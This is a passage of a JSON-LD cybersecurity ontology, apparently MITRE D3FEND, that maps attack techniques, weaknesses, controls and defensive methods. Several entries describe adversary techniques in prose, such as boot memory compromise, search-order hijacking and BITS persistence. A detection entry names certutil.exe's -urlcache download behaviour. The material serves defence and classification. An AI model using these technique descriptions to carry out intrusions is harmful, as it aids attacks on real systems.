      "d3f:definition": "An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser's security model (e.g. the zone or domain).",
      "rdfs:label": "Exposed Unsafe ActiveX Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-749"
      }
    },
    {
      "@id": "d3f:DataDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Data Dependency exists when a process, operation, or system requires specific data in order to execute correctly.",
      "d3f:synonym": "Transactional Dependency",
      "rdfs:label": "Data Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-006%3ACertUtilDownloadWithURLCacheAndSplitArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-006/"
      },
      "d3f:kb-abstract": "Certutil.exe may download a file from a remote destination using -urlcache. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. However, it is uncommon for certutil.exe to write files to world writeable paths.\\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments",
      "rdfs:label": "Reference - CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments - MITRE"
    },
    {
      "@id": "d3f:T1608.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.005",
      "d3f:definition": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.",
      "rdfs:label": "Link Target",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:AML.T0043.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.003",
      "d3f:definition": "Adversaries may manually modify the input data to craft adversarial data.\nThey may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task.\nThe adversary may use trial and error until they are able to verify they have a working adversarial input.",
      "rdfs:label": "Manual Modification - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Manual Modification"
    },
    {
      "@id": "d3f:BroadcastDomainIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BroadcastDomainIsolation"
      ],
      "d3f:d3fend-id": "D3-BDI",
      "d3f:definition": "Broadcast isolation restricts the number of computers a host can contact on their LAN.",
      "d3f:filters": {
        "@id": "d3f:LocalAreaNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\nSoftware Defined Networking, or other network encapsulation technologies intercept host broadcast traffic then route it to a specified destination per a configured policy.\n\nThis can be implemented within hypervisors, networking hardware (WAPs, switches, routers), or virutal hardware.\n\n## Considerations\nThis technique is highly dependent on network infrastructure and networking requirements.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-BroadcastIsolationAndLevel3NetworkSwitch_HewlettPackardEnterpriseDevelopmentLP"
        },
        {
          "@id": "d3f:Reference-PrivateVirtualLocalAreaNetworkIsolation_CiscoTechnologyInc"
        }
      ],
      "d3f:synonym": "Network Segmentation",
      "rdfs:label": "Broadcast Domain Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N8e7d2927fdd74c23b132e67b9982f283"
        }
      ]
    },
    {
      "@id": "_:N8e7d2927fdd74c23b132e67b9982f283",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1110.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.002",
      "d3f:definition": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)",
      "rdfs:label": "Password Cracking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Nf97066a2ff7e44f69241ec6243a14b38"
        }
      ]
    },
    {
      "@id": "_:Nf97066a2ff7e44f69241ec6243a14b38",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:OrchestrationServer",
      "@type": "owl:Class",
      "d3f:definition": "A d3f:Server which is involved with the orchestration of workloads or the execution of orchestrated workloads.",
      "rdfs:label": "Orchestration Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Orchestration_(computing)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:Firewall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted internal network and untrusted external network, such as the Internet. Firewalls are often categorized as either network firewalls or host-based firewalls. Network firewalls filter traffic between two or more networks and run on network hardware. Host-based firewalls run on host computers and control network traffic in and out of those machines. This definition refers to network firewalls.",
      "d3f:filters": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Firewall",
      "rdfs:seeAlso": {
        "@id": "dbr:Firewall_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "_:N026a70f674184f73b23ebf23eb30268a"
        }
      ],
      "skos:altLabel": "Network Firewall"
    },
    {
      "@id": "_:N026a70f674184f73b23ebf23eb30268a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:MotionSensorMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MotionSensorMonitoring"
      ],
      "d3f:d3fend-id": "D3-MSM",
      "d3f:definition": "Monitoring events from motion detectors (e.g., passive IR, microwave, dual-technology) to detect presence or movement within protected areas.",
      "d3f:kb-article": "## How it works\n\nMotion sensors generate events when movement is detected within their coverage pattern. Alarm panels or PACS correlate motion with arming schedules, door openings, and other sensors; video systems can use motion to trigger recording or bookmarks. Cross-zoning and sensitivity/pulse-count settings are commonly adjusted to balance detection and false-alarm rates.\n\n## Considerations\n\n* Place sensors at appropriate height and angle with clear line of sight, avoiding obstructions or reflective surfaces that can cause missed or false detections.\n* Reduce false alarms by tuning sensitivity and pulse-count, using cross-zoning when needed, and accounting for HVAC airflow or rapid thermal changes.\n* Monitor tamper and supervision signals; for wireless devices, verify periodic check-ins and battery levels; perform regular walk tests to validate coverage.\n* Integrate motion events with cameras and with door position switches and other sensors in the protected area to provide context and faster verification; use motion to trigger recording or bookmarks.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-Wikipedia-MotionDetector"
        },
        {
          "@id": "d3f:Reference-Wikipedia-PIRSensor"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:MotionDetector"
      },
      "d3f:synonym": [
        "Motion Alarm Monitoring",
        "Motion Detector Monitoring"
      ],
      "rdfs:label": "Motion Sensor Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:Nc8ce299e03c24024aec8cdc0aacdb94e"
        }
      ]
    },
    {
      "@id": "_:Nc8ce299e03c24024aec8cdc0aacdb94e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MotionDetector"
      }
    },
    {
      "@id": "d3f:T1474",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474",
      "d3f:definition": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.",
      "rdfs:label": "Supply Chain Compromise - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Supply Chain Compromise"
    },
    {
      "@id": "d3f:T1197",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1197",
      "d3f:definition": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.",
      "d3f:may-produce": [
        {
          "@id": "d3f:IntranetIPCNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetWebNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetWebTraffic"
        }
      ],
      "rdfs:label": "BITS Jobs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N6c6e3a1823004e5fb349677d9d0e0df8"
        },
        {
          "@id": "_:N0078e2c23b9541af987630f834861261"
        },
        {
          "@id": "_:Ne55a59cca05f40178a6b0599485f983c"
        }
      ]
    },
    {
      "@id": "_:N6c6e3a1823004e5fb349677d9d0e0df8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      }
    },
    {
      "@id": "_:N0078e2c23b9541af987630f834861261",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetWebNetworkTraffic"
      }
    },
    {
      "@id": "_:Ne55a59cca05f40178a6b0599485f983c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:TA0033",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Lateral Movement - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:T1027.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.005",
      "d3f:definition": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.",
      "rdfs:label": "Indicator Removal from Tools",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:CCI-001574_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system rejects or delays, as defined by the organization, network traffic which exceed the organization-defined thresholds.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001574"
    },
    {
      "@id": "d3f:EX-0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0004",
      "d3f:definition": "The attacker manipulates memory and configuration used in the earliest stages of boot so that their code runs before normal protections and integrity checks take hold. Targets include boot ROM vectors, first-stage/second-stage bootloaders, boot configuration words and strap pins, one-time-programmable (OTP) fuses, non-volatile images in flash/EEPROM, and scratch regions copied into RAM during cold start. Techniques range from replacing or patching boot images to flipping configuration bits that alter trust decisions (e.g., image selection, fallback order, watchdog behavior). Faults can be induced deliberately (timed power/clock/EM glitches) or via crafted update/write sequences that leave a partially programmed but executable state. Once resident, the modification can insert early hooks, disable or short-circuit checks, or select downgraded images; destructive variants corrupt the boot path to induce a persistent reset loop or safeing entry (a denial of service). Because boot logic initializes buses, memory maps, and handler tables, even small changes at this stage cascade, shaping how command handlers load, how keys and counters are initialized, and which peripherals are trusted for subsequent execution.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:BootROM"
        }
      ],
      "rdfs:label": "Compromise Boot Memory - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0004/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N56836d2e731f4f609fd8be4b127f37f2"
        },
        {
          "@id": "_:N68f9756e15a1461bb39263803ed4219f"
        }
      ],
      "skos:prefLabel": "Compromise Boot Memory"
    },
    {
      "@id": "_:N56836d2e731f4f609fd8be4b127f37f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:N68f9756e15a1461bb39263803ed4219f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootROM"
      }
    },
    {
      "@id": "d3f:CWE-397",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-397",
      "d3f:definition": "The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.",
      "rdfs:label": "Declaration of Throws for Generic Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:CWE-214",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-214",
      "d3f:definition": "A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system.",
      "rdfs:label": "Invocation of Process Using Visible Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-497"
      }
    },
    {
      "@id": "d3f:SystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:TimeInstant"
      },
      "d3f:definition": "In computing, system time represents a computer system's notion of a point in time.",
      "d3f:derived-from": {
        "@id": "d3f:OperatingSystemClock"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_time"
      },
      "rdfs:label": "System Time",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemPlatformVariable"
        },
        {
          "@id": "_:N6cbbc9e0cdc843b39e6aef9d4f1229c7"
        },
        {
          "@id": "_:Na5b416181c6242ca8027da33f4d78cb2"
        }
      ]
    },
    {
      "@id": "_:N6cbbc9e0cdc843b39e6aef9d4f1229c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeInstant"
      }
    },
    {
      "@id": "_:Na5b416181c6242ca8027da33f4d78cb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:derived-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "d3f:CWE-1286",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1286",
      "d3f:definition": "The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax.",
      "rdfs:label": "Improper Validation of Syntactic Correctness of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-428",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-428",
      "d3f:definition": "The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.",
      "rdfs:label": "Unquoted Search Path or Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:LogMessageFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Produces an entry in a log.",
      "d3f:produces": {
        "@id": "d3f:DigitalEventRecord"
      },
      "rdfs:label": "Log Message Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N999772d0f65b4809ade63144b7598701"
        }
      ]
    },
    {
      "@id": "_:N999772d0f65b4809ade63144b7598701",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEventRecord"
      }
    },
    {
      "@id": "d3f:RemoveUserFromGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user is removed from a group, revoking the permissions and privileges associated with the group from the user.",
      "rdfs:label": "Remove User from Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "_:Nd96cfbbe20764e96b9f72ed7ff80c7d6"
        },
        {
          "@id": "_:Nebb9ce29fdb2465d810f92c2a439315d"
        }
      ]
    },
    {
      "@id": "_:Nd96cfbbe20764e96b9f72ed7ff80c7d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:Nebb9ce29fdb2465d810f92c2a439315d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AddUserToGroupEvent"
      }
    },
    {
      "@id": "d3f:CCI-001009_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses cryptographic mechanisms to protect and restrict access to information on portable digital media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001009"
    },
    {
      "@id": "d3f:T0848",
      "@type": "owl:Class",
      "d3f:attack-id": "T0848",
      "d3f:definition": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection.",
      "rdfs:label": "Rogue Master - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Rogue Master"
    },
    {
      "@id": "d3f:T1461",
      "@type": "owl:Class",
      "d3f:attack-id": "T1461",
      "d3f:definition": "An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:",
      "rdfs:label": "Lockscreen Bypass - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Lockscreen Bypass"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(13)"
    },
    {
      "@id": "d3f:T1586.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.002",
      "d3f:definition": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).",
      "rdfs:label": "Email Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:Timer",
      "@type": "owl:Class",
      "d3f:definition": "A timer or countdown timer is a type of clock that starts from a specified time duration and stops upon reaching 00:00. It can also usually be stopped manually before the whole duration has elapsed. An example of a simple timer is an hourglass. Commonly, a timer triggers an alarm when it ends. A timer can be implemented through hardware or software.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Timer"
      },
      "rdfs:label": "Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "d3f:RuntimeVariable"
        }
      ]
    },
    {
      "@id": "d3f:T1574.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.008",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.",
      "rdfs:label": "Path Interception by Search Order Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N0553f7c357b74be0b3ab16f1415593b7"
        }
      ]
    },
    {
      "@id": "_:N0553f7c357b74be0b3ab16f1415593b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:REC-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.01",
      "d3f:definition": "Adversaries enumerate and correlate all identifiers that uniquely tag the vehicle throughout its lifecycle and across systems. Examples include NORAD/Satellite Catalog numbers, COSPAR designators, mission acronyms, spacecraft serials and bus IDs, regulatory call signs, network addresses used by mission services, and any constellation slot or plane tags. These identifiers allow cross-reference across public catalogs, tracking services, regulatory filings, and operator materials, shrinking search spaces for pass prediction, link acquisition, and vendor ecosystem discovery. Seemingly minor clues, like a configuration filename embedding a serial number or an operator using the same short name across environments, can expose test assets or internal tools. Rideshare and hosted-payload contexts introduce additional ambiguity that an attacker can exploit to mask activity or misattribute traffic.",
      "rdfs:label": "Identifiers - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Identifiers"
    },
    {
      "@id": "d3f:CramersV",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CV",
      "d3f:definition": "Cramér's V (sometimes referred to as Cramér's phi and denoted as φc) is a measure of association between two nominal variables, giving a value between 0 and +1 (inclusive) and is based on Pearson's chi-squared statistic.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Cramér's V. [Link](https://en.wikipedia.org/wiki/Cram%C3%A9r%27s_V)",
      "d3f:synonym": "Cramer's Phi",
      "rdfs:label": "Cramer's V",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:WindowOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates, opens, reopens, or deletes a file.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openfile"
      },
      "rdfs:label": "Windows OpenFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateFile"
        },
        {
          "@id": "d3f:OSAPIOpenFile"
        },
        {
          "@id": "_:N49bd77bf2f854826bb90d5ca3d10ac1a"
        }
      ]
    },
    {
      "@id": "_:N49bd77bf2f854826bb90d5ca3d10ac1a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenFile"
      }
    },
    {
      "@id": "d3f:OperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating mode designates the specific way a system, product, or service functions for a particular task, configuration, or phase of operation",
      "rdfs:label": "Operating Mode",
      "rdfs:seeAlso": {
        "@id": "https://www.wassonstrategics.com/pdf/Wasson%20-%20System_Phases_Modes_and_States_Rev.%20D%20(10-29-14).pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:OSAPISetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that modifies the execution context of a thread.",
      "d3f:invokes": {
        "@id": "d3f:SetThreadContext"
      },
      "rdfs:label": "OS API Set Thread Context",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nb77ff40e310043c9a18998955fcd6afa"
        }
      ]
    },
    {
      "@id": "_:Nb77ff40e310043c9a18998955fcd6afa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SetThreadContext"
      }
    },
    {
      "@id": "d3f:T1679",
      "@type": "owl:Class",
      "d3f:attack-id": "T1679",
      "d3f:definition": "Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`.(Citation: Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024)",
      "rdfs:label": "Selective Exclusion",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1540",
      "@type": "owl:Class",
      "d3f:attack-id": "T1540",
      "d3f:definition": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1631.001",
      "rdfs:label": "Code Injection - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1631.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Code Injection"
    },
    {
      "@id": "d3f:CredentialEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialEviction"
      ],
      "d3f:d3fend-id": "D3-CE",
      "d3f:definition": "Credential Eviction techniques disable or remove compromised credentials from a computer network.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies"
      },
      "rdfs:label": "Credential Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Na6b77463789a4fa8bb38dc62c76a92b0"
        }
      ]
    },
    {
      "@id": "_:Na6b77463789a4fa8bb38dc62c76a92b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:Processor",
      "@type": "owl:Class",
      "d3f:definition": "A processor is a hardware component or integrated circuit that performs computations, executes instructions, and processes data to carry out tasks within a computing system.",
      "d3f:synonym": "Computer Processor",
      "rdfs:label": "Processor",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-540",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-540",
      "d3f:definition": "Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.",
      "rdfs:label": "Inclusion of Sensitive Information in Source Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
